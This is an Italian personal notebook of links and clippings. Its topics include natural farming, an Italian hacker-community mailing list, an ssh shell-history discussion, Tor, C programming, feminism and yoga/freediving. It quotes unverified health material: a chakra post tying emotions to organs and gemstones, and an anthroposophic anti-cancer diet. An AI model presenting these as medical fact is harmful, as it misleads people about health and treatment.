aiuto: help@autistici.org
********************************************************************************************************************************
.
I N F O R M A T I C A
1973 motorola
https://www.facebook.com/photo?fbid=917400240596919&set=a.512947661042181
cinema prima Hp poi Apple
https://www.theguardian.com/film/2010/apr/21/mac-pc-carrie-sex-city
Sex and The City 2 even more of a sellout, Carrie switches to a PC
Carrie turned down the blue Clamshell Mac!
byu/Reddish81 insexandthecity
Erboristeria, Macrobiotica, Agricoltura sinergica
______________________________________________________________
https://www.terranuovalibri.it/libro/dettaglio/antonio-onorati/in-difesa-dei-contadini-9788866819943-236825.html
Grazie per l'interesse che hai mostrato iscrivendoti al webinar gratuito che si tiene
giovedì 12 dicembre alle ore 21, con Kutluhan Ozdemir ed Ezio Maisto della Rete
per l'agricoltura naturale dal titolo «L'agricoltura naturale e l'arte del non fare"
QUI il link per seguire il webinar: https://youtube.com/live/Uq5JLBweHs8
Qui puoi ordinare il libro e sfogliarne anche l'anteprima:
https://www.terranuovalibri.it/libro/dettaglio/kutluhan-ozdemir/lagricoltura-naturale-e-larte-del-non-fare-9788866819806-236808.html
[-c]
https://maria2021.noblogs.org/files/2024/11/La-cucina-italiana-non-esiste-Daniele-Soffiati-Alberto-Grandi.pdf
due nuovi video Macromediterranea al mare
https://lagrandevia.teachable.com/courses/enrolled/2681970
Disturbi nutrizione alimentare, il Consiglio regionale approva legge a firma di Alaia
[-k]
https://www.rudolfsteiner.it/shop/libri/alimentazione/dieta-contro-il-cancro-come-prevenire-/
metabolismo: meccanismo della luce
https://maria2021.noblogs.org/files/2024/11/Udo-Renzenbrink.-Dieta-contro-il-cancro.-secondo-la-scienza-antroposofica-di-Rudolf-Steiner.pdf
[l]
https://shop.edizionistazioneceleste.it/libro/la-luce-in-cucina/
[-l]
David Mariani – Healthy Habits
https://www.facebook.com/groups/1952235098178443/
David Mariani – Healthy Habits | Facebook
Il gruppo Healthy Habits nasce per aiutare le persone e le famiglie ad orientarsi verso scelte consapevoli nel campo del muovimento, della psicologia,…
www.unicamillus.org
https://www.facebook.com/healthyhabits.it
https://www.instagram.com/p/DA-RjEpM7JJ/
https://www.instagram.com/irbimcnr/
https://maria2021.noblogs.org/files/2024/11/Fai-pace-con-il-cibo-David-Mariani-Sabrina-Lucchetti.pdf
[m]
https://paesiedizioni.it/archimede/il-grande-banchetto/
https://www.linkedin.com/in/antonio-picasso-9818076/?originalSubdomain=it
" E da chi verranno pagati gli aggiustamenti dei listini? Fa contraltare l’industria manifatturiera,
favorevole a imboccare canali preferenziali in mercati lontani, ricchi di materie prime
e di consumatori cui destinare il nostro Made in Europe. La contorsione del problema è evidente
nelle rispettive prese di posizione delle categorie produttive italiane: Confindustria ci sta.
Confagricoltura e Coldiretti no."
"a questa nuova ricerca dell"Eldorado"
Mercosur, bel colpo o mina vagante: contrari agricoli e verdi insieme. Cina e Stati Uniti in agguato
https://maria2021.noblogs.org/files/2024/11/Il-grande-banchetto-Paesi-Edizioni.pdf
.
Astrofisica
____________________________________________________________________________________________________________________________–
[k]
https://www.store.rubbettinoeditore.it/catalogo/capitalismo-stellare/
Microsoft Flight Simulator 2024 (Asobo Studio) ·
Kyle Martin · 1 g ·
Ieri ho superato il checkride pilota privato con 42 ore e posso dire senza dubbio
che Flight Simulator è la ragione. Mi ha risparmiato migliaia di dollari. Se sei
in questo gruppo a chiederti se la sim andrà a beneficio di te e di una formazione
futura, ti posso promettere che se la usi come strumento educativo risparmierai
assolutamente e ti sentirai più a tuo agio quando entrerai nel vero affare.
https://www.facebook.com/hashtag/astronauticast
Fiumicino
simulatori
UN GIORNO DA PILOTA Wizz Air
andreagaleazzi.com
"V1, Vr, V2" (30) – Video didattici per Volo Simulato
Com Ivan Anzellotti
Aviation Update
https://www.facebook.com/groups/969604991420188
Anthea Comellini
https://www.facebook.com/tg2rai/videos/391144574029461
yoga ginastica respirazione apnea
leggedo:
[j]
https://it.forvo.com/word/%CE%AC%CE%BD%CE%B5%CE%BC%CE%BF%CF%82/
Flower Power. Le piante e i loro diritti – Alessandra Viola
Libera Università Crostolo
Alessandra Viola
Chiedi a una pianta
https://www.instagram.com/ristoceano_roma/
inscritto al corso gratuito macromediterraneo
https://lagrandevia.teachable.com/courses/enrolled/2681970
–
https://circex.org/it/news/libro-pedagogia-hacker-fant-milani
20 21 dicembre forte prenestino roma
05.Sep 11:04:32) boyska via Hackmeeting wrote:
>Ciao acarezze,
>lo sapevate vero, che AvANa fa 30 anni? Avete pensato al regalo?
>Intanto pensate ad accaparrarvi un posto alla festa.
>
Venerdì 20 e sabato 21 Dicembre 2024
Ieri durante hackordyie a Bologna ho citato il messaggio dalla bbs
cybernet sul 1 compleanno di AvANa (vedi sotto).
Ho anche fatto una supposizione errata sull'identità di Mr. Tattle,
che mi hanno detto essere sbagliata.
Mr. Tattle era il nome collettivo assunto dai sysop della bbs.
Scusate per l'informazione scorretta
——-
From: Mr. Tattle (65:1300/2) 11/12/1995 22:20
To: All
Subj: Un anno di AvANa al Forte
FATTI DI FINE MILLENNIO
DUE GIORNI DI NAVIGAZIONE PSICHICA
Ci siamo….
Solo 3 giorni al compleanno di Mr.Tattle!!!
E quindi ecco il programma delle 2 serate al Forte Prenestino C.S.O.A. (che ha
stoppato l'asta)
Venerdi' 15
ore 19 presentazione di Derive/Approdi n. 8 e
dibattito: "nuove frontiere per l'autoproduzione"
a cura degli infoShop dei C.S.O.A. Forte Prenestino, Auro e Marco,
Brancaleone e Zona Rischio.
interverranno Derive/Approdi, Assalti Frontali, Grafton 9, Wide, Shake
ed.
ore 22 concerto Oracle 90
ore 24 Trance Party con Klange
Sabato 16
ore 19 presentazione del libro "l'occhio della piramide" di R. Shea e
R.A. Wilson, primo volume della trilogia degli illuminati (Shake ed.)
interverranno gli editori
ore 22 Dance Hall Jungle
ore 23 Chill Out – Ambient music – brain machine – smart bar.
ore 24 Techno Party fino all'alba.
Entrambi i giorni: prove generali della nuova AvANa bbs e mostra documentaria
su un anno di attivita'.
Rassegna archeotecnologica videoGames '80 in ambiente Sciatto.
Birreria e bar
Rimanete sintonizzati….
——–
_______________________________________________
Hackmeeting mailing list
https://www.autistici.org/mailman/listinfo/hackmeeting
_______________________________________________________________________________________________________________________________________________________________________________________________
[w]
leggendo
.
https://www.youtube.com/@primeradsecita
[y]
leggendo
Alessandro Aresu
https://www.wired.it/article/guerra-algoritmi-intelligenza-artificiale-dati-controllo/?
Sardegna, bottarga. Ultimo libro: "Geopolitica dell'intelligenza artificiale". Per scrivermi: alessandroaresu@gmail.com
Come ha fatto Jensen Huang a fondare e costruire NVIDIA? Che legame stretto c’è tra il Cynar
e l'intelligenza artificiale generale? Cosa scriveva Leibniz ai gesuiti sulla Cina?
Quali sono i “mulini satanici” del nostro tempo? Ne parliamo dal 22 ottobre in libreria.
https://x.com/alearesu/status/1840730707607314871/photo/1
https://www.limesonline.com/autori/alessandro_aresu/
https://presidenza.governo.it/amministrazionetrasparente/personale/curriculum/dettaglio.asp?d=23703&queryInServizio=nocessa
@alearesu
Nell’ultima conversazione con
@aldesiderio
su YouTube, torniamo su un tema molto controverso: il potere di Elon Musk, al centro
dell’attenzione dopo il premio consegnato a Giorgia Meloni. Thread di breve spiegazione (1/15)
https://x.com/alearesu/status/1839020209492869261
https://www.youtube.com/@ibexedizioni
ELON MUSK quello che nessuno dice su potere, affari e geopolitica. Con Alessandro Aresu
Ibex Edizioni
https://www.feltrinellieditore.it/opera/geopolitica-dellintelligenza-artificiale/
[j]
Antonella Viola
https://www.instagram.com/antonellaviolaofficial/
https://it.wikipedia.org/wiki/Antonella_Viola
"IL TEMPO DEL CORPO" DELL'IMMUNOLOGA ANTONELLA VIOLA E LE "CIABATTE INUTILI"
chioggiaazzurra
https://www.lafeltrinelli.it/tempo-del-corpo-sole-sonno-ebook-antonella-viola/e/9788858860427
https://maria2021.noblogs.org/files/2024/11/Il-tempo-del-corpo-Antonella-Viola.pdf
https://www.ansa.it/canale_scienza/notizie/biotech/2024/11/20/identificato-il-circuito-cerebrale-che-collega-respiro-ed-emozioni-_d0e4d598-dc4a-447b-864a-a99a50bb37b3.html
unversità di salerno
______________________________________________________________________________
https://www.facebook.com/ISISLabUNISA
Femminismo, Psichiatria, Cinema, Criminologia
____________________________________________________________________________
[x]
leggendo
https://ordinepsicologilazio.it/albo/paolamarion
biochimica del desiderio minuto 4:08
https://www.raiplay.it/video/2018/04/Quante-storie-f2cebf39-cef2-4551-a296-59680aa23908.html
Uomini e donne splendidamente diversi – Francesco Bianchi Demicheli, medico // L'ideatorio USI
L'ideatorio – USI
il disagio del desiderio
https://www.donzelli.it/libro/9788868436964
Mercoledì radio onda rossa :
16:00 – 17:30 Se c'è tutto c'è la salute
7 dicembre manifestazione nazionale Roma
contro privatizzazione della sanità
CONFERENZA NAZIONALE AUTOGESTITA PER LA SALUTE MENTALE: il Programma del 6 e 7 dicembre 2024 a Roma
https://www.medicinademocratica.org/wp/
https://www.wired.it/article/violenza-sulle-donne-dati-italia-2024/
informatica e femminismo
https://www.linkedin.com/posts/valentinanardecchia_sono-orgogliosa-di-aver-organizzato-e-poter-activity-7265014229991096321-bS_T/
https://www.aslroma1.it/
Anatomia del dolore è un viaggio nell’intimità e nella rinascita
libro da seguire come la trasmissione di lunedi a radio onda rossa
15:00 – 16:00 Normale Follia – Normalità e follia nell'infanzia e adolescenza che parla anche dei consultori
http://www.ivancavicchi.it/
https://www.ilfattoquotidiano.it/blog/icavicchi/
https://torvergata40.uniroma2.it/speakers/ivan-cavicchi/
Salviamo la sanità. Una riforma necessaria per garantire il diritto di tutti
https://www.facebook.com/scienziateneltempo
https://www.youtube.com/@Risateallitaliana-zm6cp
.
https://www.aslavellino.it/index.php/it/azienda/strutture/dipartimenti/dipartimento-salute-mentale/serd-servizi-per-dipendenze
https://it.quora.com/%C3%88-doloroso-morire-per-mancanza-di-ossigeno
*****
*
*
*
*
https://www.youtube.com/@MinisteroSalute
…………………………………
https://www.ondarossa.info/newstrasmissioni/ponte-radio/2024/11/lautodifesa-femminista
https://www.google.com/search?q=collettivo+studi+giuridici+ompeo+magno+roma&oq=collettivo+studi+giuridici+ompeo+magno+roma&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIJCAEQIRgKGKAB0gEJMTA0MzZqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8
libro donne e diritto testo letto negli anni 70
https://www.raicultura.it/storia/articoli/2019/01/LItalia-della-Repubblica—I-diritti-e-le-conquiste-delle-donne-7be7babc-a136-4059-a1e8-cd314b8ecdc6.html
https://disp.web.uniroma1.it/sites/default/files/allegati/Femminismo%20di%20M.Lombardi.docx
scoprire trasversavibilità sociale delle violenze
fase proghessiva delle elaborazione
colleggio avvocati
cambiare la struttura giuridiche delle avvocate
collettivi giuridici delle avvocate
https://www.ingenere.it/articoli/la-casa-di-tutte
come il caso di riprendiamoci la notte
contesti internazionali e contesto italiano
nuova generazione di professionisti
tipo soccorso rosso
avvocati/e magistrati centri anti violenza
autocosicenza autodifesa
immaginario
http://www.femminismo-ruggente.it/femminismo/pdf/libri/femminismo.pdf
«Chi ha paura della notte?» L’agibilità notturna delle femministe negli anni ’70
*****
saggio riprendiamoci la notte di valeria gallicchio
https://thesis.unipd.it/handle/20.500.12608/1/browse?filter_type=authority&authority=st830053&filter_value=st830053&filter_value_display=GALLICCHIO%2C+VALERIA+MARIA&type=author&sort_by=ASC&order=&rpp=20
https://thesis.unipd.it/handle/20.500.12608/63467
Cecilia Nubola, Un «tempo burrascoso». Anche le donne
sparano; Valeria Gallicchio, Paola Stelliferi,
A porte aperte! La lotta femminista nei processi per …
22,80 €
https://www.viella.it/libro/9791254696972
https://www.sissco.it/soci/stelliferi-sara/
ilaria boiano
https://www.giappichelli.it/la-violenza-nei-confronti-delle-donne-9788875245993?srsltid=AfmBOor7U0Z5sv7i9PbKcVsBXA5z0yNLjiu_WgWkj24emzIIhlLreu4Q
2022
“Mai più sole” contro la violenza sessuale
Una pagina storica del femminismo degli anni Settanta
Nadia Maria Filippini
https://www.viella.it/libro/9791254690239
2024
Nadia Alba Agustoni
https://www.ninoaragnoeditore.it/opera/avrei-voluto-da-giovane-solo-vivere
2024
L’autodifesa delle donne
Pratiche, diritto, immaginari nella storia
a cura di Simona Feci e Laura Schettini
https://www.viella.it/libro/9791254696972
Informatica
————————————————————————————————————————-
https://www.wired.it/article/armi-stampa-3d-pistole-ghost-gun/
https://x.com/S1r1u5_/status/1867909908060123163
https://x.com/S1r1u5_
•
Intro
Hacking Discord for $5000 Bounty
Mrgavyadha
Così gli hacker ci spiano e ci rubano i dati – FarWest 13/12/2024
Rai
_________________________________________________________________________________________________________________________
https://web.unisa.it/servizi-on-line/apps
Francesco Potortì
5:26 PM (1 hour ago)
to Piviul, Giancarlo, debian-italian
>
>
>[1:text/plain Show]
>
>
>[2:text/html Hide Save:noname (1kB)]
>
>On 11/27/24 23:43, Francesco Potortì wrote:
>
> […]
>Ma se ho ben capito, tu parli dei comandi eseguiti direttamente dal comando ssh, per esempio facendo "ssh nome.host.it ls -l" per vedere la lista dei file remoti nella directory remota. Se non erro quel comando "ls -l" non viene registrato in remoto perché la shell eseguita sul sistema remoto non è interattiva. Se è eseguito da una shell locale interattiva, il comando "ssh nome.host.it ls -l" viene registrato sul sistema locale.
>
>si parlo proprio dell'esecuzione di un comando shell all'interno della comando ssh; quindi è proprio così, i
>comandi eseguiti direttamente da remoto tramite ssh non vanno a finire nella bash_history… anche se
>quelli eseguiti direttamente da un comando ssh un po' interattivi sono: si possono lanciare ad esempio i
>comandi apt e rispondere interattivamente… comunque se è così è così. Grazie mille, anche oggi ho
>imparato una cosa nuova.
https://forum.debianizzati.org/viewtopic.php?t=45552
https://git.autistici.org/ai3/tools/ssh-key-wtmp/-/blob/master/main.go?ref_type=heads
Per un'idea veloce di come funziona, puoi dare un'occhiata al man di una shell e cercare la parola "interactive".
…………………………
recente
https://www.autistici.org/orangebook2/orangebook2-it.html
https://www.autistici.org/orangebook2/orangebook2-en.html
https://git.autistici.org/id/auth-server-http-proxy
https://www.autistici.org/orangebook/orangebook.pdf
https://www.autistici.org/loa/shodan/corsounix.pdf
https://www.autistici.org/docs/mail/connectionparms.it.html
*****
https://www.autistici.org/orangebook/html/x208.html
sudo tcptraceroute www.reddit.com 443
https://www.laseroffice.it/blog/2024/11/22/creare-immagini-iso-personalizzate-con-penguins-eggs-tutto-quello-che-devi-sapere/
leggendo
[0]
GIULIANO DALL'Ò, ANNALISA GALANTE
Abitare sostenibile
Come affrontarel'emergenza energetica e ambientale
https://www.mulino.it/isbn/9788815383563
[1]
http://www.ivancavicchi.it/
https://www.ilfattoquotidiano.it/blog/icavicchi/
https://torvergata40.uniroma2.it/speakers/ivan-cavicchi/
Salviamo la sanità. Una riforma necessaria per garantire il diritto di tutti
[2]
https://www.linkedin.com/in/franco-becchis-5a33a49/
[2]
https://www.apogeonline.com/libri/ethical-hacking-daniel-g-graham/
https://github.com/The-Ethical-Hacking-Book/
[4]
https://www.linkedin.com/in/duccio-facchini-043459282/?originalSubdomain=it
Offendere, minacciare, schernire qualcuno, magari in
maniera anonima, senza per questo essere perseguiti,
puniti o perlomeno stigmatizzati, non ha nulla a che
vedere con la libertà. Lo capirebbe anche un bambino.
Da anni assistiamo nei programmi televisivi a risse
inconsulte, dibattiti che si trasformano in arene, volgarità
e attacchi gratuiti, costruzione scientifica di rabbia,
scontri, offese.
Non è questa la sede per dibattere sui motivi che
rendono più o meno attraenti simili spettacoli.
Quel che ci interessa qui è guardare all’evoluzione che il
fenomeno sta conoscendo, attraverso quel canale
privilegiato, accessibile e – così si dice – democratico che
è la Rete.
Oggi da spettatori ci siamo trasformati tutti in
protagonisti. Possiamo dialogare – e nel caso litigare –
con un politico via Twitter, possiamo offendere qualcuno
in un commento che verrà letto da milioni di persone sul
sito di un grande quotidiano. Il pubblico è entrato a far
parte delle spettacolo e il suo potere è aumentato
esponenzialmente: fa parte della rissa, ne può essere
artefice e iniziatore. E ovviamente anche vittima.
Se fosse solo una questione di buona educazione non ci
sarebbe troppo di cui preoccuparsi, né sarebbe il caso di
avere rimpianti per i tempi andati.
Ma il fenomeno è diverso. Attraverso la rete assistiamo a
ripetute violazioni della privacy che espongono dati
riservati al mondo intero, a ricostruzioni approssimative,
senza verifiche e senza possibilità di replica, a
diffamazioni e offese che rovinano carriere e vita, in
alcuni casi in maniera drammatica, come hanno
dimostrato vari episodi di cyberbullismo.
[5]
*****
L’ipotesi di un mondo iniziale a RNA e della successiva necessità di avere a disposizione la maggiore stabilità del DNA potrebbe essere una ulteriore dimostrazione del fatto che l’evoluzione della vita si sia verificata secondo l’acquisizione di una complessità crescente a partire da meccanismi primordiali di natura ritmica. Tale complessità passa inevitabilmente attraverso il segno della periodicità, della circolarità di alcuni eventi biologici che poi per tramandarsi, perché dotati di significato adattativo, hanno selezionato probabilmente bioritmi sempre più precisi, selettivi e specifici. Certamente l’esistenza dei ritmi naturali fu inizialmente alla base di questi bioritmi, sin dalle prime forme di vita che regolarono l’esistenza e il funzionamento, prevalentemente diurni, di alcune specie.
Con il passare dei secoli i bioritmi si dimostrarono sempre più utili in termini evolutivi.
https://www.ispezioneperugia.it/papers/il-gene-egoista—richard.pdf
https://www.laseroffice.it/blog/2024/11/14/la-scomparsa-di-darl-mcbride-unindifferenza-sconcertante-nel-mondo-di-gnu-linux/
https://www.laseroffice.it/blog/2024/11/02/miglioramenti-delle-prestazioni-del-kernel-linux-la-patch-di-linus-torvalds/
L i n g u a g g i o C
*****
https://www.udemy.com/course/il-linguaggio-c/learn/lecture/41595346#overview
9. Operatori logici e relazionali
https://it.wikipedia.org/wiki/Operatori_in_C_e_C%2B%2B
https://www.okpedia.it/gli-operatori-logici-nel-linguaggio-c#google_vignette
https://bovolato.dev/archive/tutorial-c/file/
esempi di file.c :
https://bovolato.dev/archive/tutorial-c/operatori-logici/
*
*
*
*
* * * * *
17 novembre
dite nella presa diretta ore 21 giorni pari
giorni dispari selezione da dite nella presa:
Cos’è Shodan, il motore di ricerca di dispositivi connessi a internet
Cos’è Shodan, il motore di ricerca di dispositivi connessi a internet
21:00 – 22:30 Le Dita nella Presa – approfondimento tecnologico
https://www.ondarossa.info/newstrasmissioni/dita-nella-presa/2024/11/domini-che-vanno-multe-che-vengono
complottismo a un certo punto invece di analizzare i log questi grandissimi hacker si parlino al telefono:
https://www.geopop.it/come-capire-se-il-nostro-telefono-e-stato-hackerato-i-9-segnali-da-tenere-docchio/
secondo la polizia giudiziaria prendevano informazioni da banche dati tramte poliziotti corrotti
https://www.open.online/2024/10/28/banche-dati-spionaggio-equalize-archivi-polizia/
CRIMINALITÀ INFORMATICA
E INTELLIGENZA ARTIFICIALE
https://scuolainterforze.interno.gov.it/wp-content/uploads/2023/05/Quaderno-II-2022_Polizia_INTERNO_DEF.pdf
https://www.wired.it/article/beyond-piattaforma-dossier-equalize-come-funziona-dati/
Agenzia per la
cybersicurezza nazionalexz
https://www.acn.gov.it/portale/w/minaccia-cyber-il-quarto-report-di-acn
recente:
https://www.wired.it/article/agenzia-per-la-cybersicurezza-nazionale-equalize-inchiesta-calamucci-milano/
venerdi 15 novembre
replica Entropia massima
https://www.ondarossa.info/trx/dita-nella-presa
La AI per la guerra diventa realtà: la svolta con gli ultimi conflitti
La AI per la guerra diventa realtà: la svolta con gli ultimi conflitti
https://sites.units.it/etica/2024_2/LEPORE.pdf
tecnologie convergenti
https://www.aiccon.it/wp-content/uploads/2018/11/Quaderni-dell%E2%80%99Economia-Civile-5.pdf
capitalismo di sorveglianza estrattivismo dei dati non vuole che chi sa sappia:
sua tesi centrale e cioè che oggi oggetto di scambio di mercato e di arricchimento siano non solo le informazioni sulle persone ma le persone stesse con le loro esperienze di vita.
https://www.fondazioneleonardo.com/stories/chi-sorveglia-il-capitalismo-della-sorveglianza
https://www.fondazioneleonardo.com/videos/troll-web-chi-sono-come-agiscono-cyberwords
.
.
..
.
.
T O R
Come gestire nodi TOR dalla tua cantina / Osservatorio Nessuno / MOCA24
Metro Olografix
https://metrics.torproject.org/rs.html#search/italy
erika gherardi il costo della privacy tor
https://substack.com/home/post/p-151895801
Tails su penna usb:
NESSUNO PUÒ TROVARTI: IL SEGRETO DEI PROFESSIONISTI PER NAVIGARE SENZA TRACCE
Smart Tech [Tutorial]🔥
.
fedora:
da file manager installare file e si leggono i file temporanei
https://elementary.io/
ha scritto un pezzo: pensiero laterale
https://www.instagram.com/beatrice_antolini/
https://it.wikipedia.org/wiki/Pensiero_laterale
https://www.linkedin.com/pulse/gauss-laterale-daniele-scaglione/
la cartografia i garmin gps
qui abbiamo messo il programma di hackrocchio:
https://hackrocchio.org/programma/
è il prossimo fine settimana!
Sarebbe molto bello per noi sapere quanti esseri umani mangiano e
dormono nella due giorni, quindi segnatevi liberamente qui con i nomi
che più vi piacciono, così da avere un idea:
https://pad.cisti.org/p/hackrocchio2024-posti
ci vediamo questo weekend per chi riesce a salire a Torino
altrimenti ci vedremo presto in giro
bticoin
https://it.cointelegraph.com/learn/how-to-mine-bitcoin-a-beginners-guide-to-mine-btc
https://it.rs-online.com/web/content/discovery-blog/idee-suggerimenti/oscilloscopio-guida
Fango e falsità: il sottile confine tra hacker e operatori informatici
Edizioni Il Punto d'Incontro
https://www.rainews.it/video/2024/11/dossieraggi-indagato-hacker-che-scovo-allora-latitante-cesare-battisti-a7eda80d-93bb-418f-ae1d-7e07307a2814.html
https://www.msn.com/it-it/notizie/italia/indagato-gabriele-pegoraro-il-genio-informatico-che-scov%C3%B2-cesare-battisti-io-ho-servito-il-mio-paese/ar-AA1toehp
Domenica Radio Onda Rossa
Le Dita nella Presa
https://www.ondarossa.info/trx/dita-nella-presa
https://www.youtube.com/@codingcreativo
*****
Dipartimento di Informatica, Università di Salerno
11 h
·
[SEMINARI APERTI AL PUBBLICO – PILLOLE DI INFORMATICA]
📢 Il Dipartimento di Informatica dell'Università di Salerno presenta "Pillole di Informatica nella Società Odierna"
Un ciclo di seminari gratuiti e aperti al pubblico, ideato per diffondere conoscenze informatiche e promuovere un uso consapevole delle tecnologie digitali.
Questo ciclo di sette incontri affronterà temi di grande attualità come l’intelligenza artificiale, la privacy, la sicurezza digitale e la robotica sociale, offrendo momenti di riflessione e strumenti pratici per gestire i rischi e le opportunità dell’era digitale. Ciascun incontro è condotto da docenti esperti del Dipartimento e prevede anche una sessione laboratoriale interattiva.
Il ciclo è riconosciuto dal MIUR per i docenti che potranno ottenere un attestato iscrivendosi su S.O.F.I.A.
Organizzazione:
Progetto Lauree Scientifiche – Università di Salerno
Responsabile: Prof.ssa Delfina Malandrino
🔗https://lc.cx/2BPZrr
Attività di Terza Missione – Dipartimento di Informatica
Delegato: Prof. Vittorio Scarano
🔗 https://lc.cx/YFYNvy
📅 Inizio: 15 novembre 2024
🔗 https://bit.ly/pillolediinformatica
📍 Sede: Aula P4, Edificio F3, Università di Salerno
🗺️ Google Maps
https://lc.cx/zree6z
Programma degli incontri:
15 nov: Didattica e stereotipi di genere, Prof.ssa Ferrucci
19 nov: Internet delle Cose, Prof. Esposito
22 nov: Dati e manipolazione, Prof. Scarano
26 nov: Dati personali e sensibili, Prof.ssa Malandrino
29 nov: Robotica Sociale, Dott. Solimando
3 dic: Computational Intelligence, Prof. Zaccagnino
6 dic: AI ed Etica nella Didattica, Dott. Lomasto
📌 Iscrizioni:
Pubblico: https://forms.gle/kettVEtGYEytaJTz9
Docenti (S.O.F.I.A.): https://lc.cx/6ypuvS
*****
___________________________________________________________________
scoperta recente
https://www.ansa.it/canale_scienza/notizie/biotech/2024/11/20/identificato-il-circuito-cerebrale-che-collega-respiro-ed-emozioni-_d0e4d598-dc4a-447b-864a-a99a50bb37b3.html
sport
https://www.instagram.com/giorgiastangherlin/
I principi di Anukalana Yoga – pratichiamo insieme la respirazione articolare
YogaSoul
spazio naturale Napoli
YOGA e RESPIRO | Respirazione diaframmatica o toracica
nuvola yoga
..
1. I rappresentanti dell’Ayurveda moderno
2. I Dosha: la tipologia VATA (fine)
3. Cucina ayurvedica
Per vedere la puntata collegati a:
Eudemonia Podcast: https://www.eudemonia-podcast.org/website
YouTube: https://youtu.be/MWQPL1ibZvc?si=E9EEYTsZ50XxaY97
Per tutte le puntate: https://eudemonia.blog/ayurveda—dintorni
.
Monia Martini
·
Quarto chakra: chakra del cuore. Plesso toracico e polmonare. Ghiandole associate timo, organi sistema circolatorio nervo vago polmoni sangue mani. In Eccesso possessività gelosia teatralità sperpero. In difetto avarizia egoismo freddezza indifferenza asocialità rifiuto contatto fisico annullamento di sé. Equilibrio altruismo amore verso se stessi forza interiore amare l' altro senza idealizzarlo. Colore verde e Colore rosa. Nota musicale Fa . Olio essenziale di oggi bergamotto. Pietra di oggi Avventurina. Il nostro segreto Rinunciare alle ostilità…perdonarsi e perdonare , cantare , correre al proprio ritmo praticare una corretta respirazione con l aiuto di maestri yoga e innamorarsi ❤️
..
https://www.instagram.com/martina100fanti/
.
Apnea
Alessia Zecchini
filippine
https://www.instagram.com/camotesfreediving/
alessia zecchini sulla "ipertensione polmonare"
Immagine del profilo di msd_salute
Il respiro si ferma a metà. La fame d’aria ti accompagna ovunque. Ti sembra di annegare.
Sono solo alcuni dei sintomi dell’ipertensione arteriosa polmonare (IAP): una patologia rara e cronica che colpisce cuore e polmoni, stravolgendo la quotidianità di coloro che ne soffrono, chiamati a confrontarsi con la costante sensazione di vivere “in apnea”.
Per dare voce all’esperienza di chi convive con la patologia, ma anche per offrire strumenti e risorse utili a gestirla, nasce “Al cuore del respiro. Ipertensione arteriosa polmonare: conoscila in profondità”: la campagna di MSD che inaugura una nuova narrazione dell’ipertensione arteriosa polmonare, raccontando la patologia attraverso la metafora dell’immersione e del viaggio profondo, fino al “cuore del respiro”.
🥽 Per farlo, abbiamo chiesto alla campionessa mondiale di apnea @alessia.zecchini di confrontarsi con Marla, una donna che convive con ipertensione arteriosa polmonare.
Nei dialoghi emergono gli elementi che differenziano i loro percorsi ma anche i tratti in comune di chi vive in “apnea”.
A unire due Vite apparentemente tanto distanti sono forza, coraggio, determinazione e fiducia.
Fiducia nel futuro e nelle strategie terapeutiche innovative che possano dare nuove prospettive di Vita alle Persone colpite.
👉🏻 Guarda il video “Apnea” e scopri sul sito "www.alcuoredelrespiro.it" tutte le risorse messe a disposizione dall’iniziativa, promossa da MSD con il patrocinio di @aipi_odv – Associazione Ipertensione Polmonare Italiana e @amipodv – Associazione Malati di Ipertensione Polmonare.
#IpertensioneArteriosaPolmonare #IAP #IPawarenessMonth #AlCuoreDelRespiro #MSD
@msd_salute
https://www.instagram.com/p/DC4C6mzt3a6/
https://www.instagram.com/saveoursharks/
https://www.instagram.com/subtridente/
servizio Rai 1 18 11 2024
alessia zecchini parla dei coralli
https://www.instagram.com/alessia.zecchini/
https://www.instagram.com/alessia.zecchini/reel/DC6oLoIgQpF/
urbeat.it e alessia zecchini in pranayama yoga
https://www.instagram.com/urbeat.it/
https://www.instagram.com/p/DAims1ki05a/?img_index=1
https://www.instagram.com/salvimar.watersports/
https://www.instagram.com/jeanchabaud/
ipertensione arteriosa polmonare
https://www.instagram.com/p/DC1CnqBPEPV/?img_index=1
https://www.instagram.com/msd_salute/
come viene diagnosticato il tumore al polmone
https://www.instagram.com/p/DC1CnqBPEPV/?img_index=1
https://it.wikipedia.org/wiki/Respiro_profondo_-_La_sfida_di_Alessia_Zecchini
https://www.instagram.com/salvimar.watersports/
https://www.facebook.com/100044595752107/photos/1103914277771754/?_rdr
https://www.enciclopediadelledonne.it/edd.nsf/biografie/alessia-zecchini*
VIDEO Flash Acquatico di Swimbiz con la Signora degli abissi, Alessia Zecchini
https://www.instagram.com/marty.werner/
https://www.instagram.com/asiapaganessii/
https://www.instagram.com/hfarmcollege/
https://www.instagram.com/matteo.battiston/
barrette vegane
https://www.instagram.com/dominicawhalewhisperer/
🇹🇿 ASANTE SANA, Zanzibar – parte 1 🏝️
Grazie per le emozioni indimenticabili, i paesaggi mozzafiato e i ricordi stupendi che resteranno per sempre impressi nel mio cuore. 💙
Thank you for the unforgettable emotions, breathtaking landscapes, and beautiful memories that will forever remain in my heart. 🥰
https://www.instagram.com/y40_thedeepjoy/
https://www.instagram.com/p/DCWX_qCsWSI/
https://www.instagram.com/apnea.dreams/
https://www.instagram.com/antonio_mogavero_/
https://www.instagram.com/chiaraobino/
https://www.instagram.com/simonaauteri/
https://www.instagram.com/accademiadeicampioni2024/
venerdi 6 dicembre nuovo teatro ateneo roma
Alessia Zecchini, jo squillo, cinzia pennesi, barbara alberti
https://www.facebook.com/photo/?fbid=1198369472293282&set=a.489918209805082
https://www.instagram.com/rewritersmag/p/DCKQgFYodUs/
Eugenio Tosto
https://www.instagram.com/the_best_is_yet_to_come_gr7/
https://www.instagram.com/wada_ama/
Ilaria Molinari
https://www.instagram.com/beuchat_diving/
La ricerca scientifica ha dimostrato che la qualità del respiro ha un impatto diretto sull'aspettativa di vita.
La respirazione non solo influisce sul nostro benessere quotidiano, ma ha anche il potere di migliorare la nostra salute a lungo termine, prevenendo malattie croniche e potenziando le funzioni vitali.
Ecco 3 modi in cui la respirazione consapevole influenza la longevità:
1. Riduzione del rischio cardiovascolare
Uno studio condotto nell’ambito del Framingham Heart Study ha rilevato che una respirazione efficiente è collegata a una migliore capacità vitale polmonare, che a sua volta è correlata a una minore incidenza di malattie cardiovascolari. Una respirazione profonda e consapevole migliora la circolazione sanguigna e riduce la pressione arteriosa, fattori cruciali per prevenire patologie cardiache.
2. Ottimizzazione della funzione polmonare
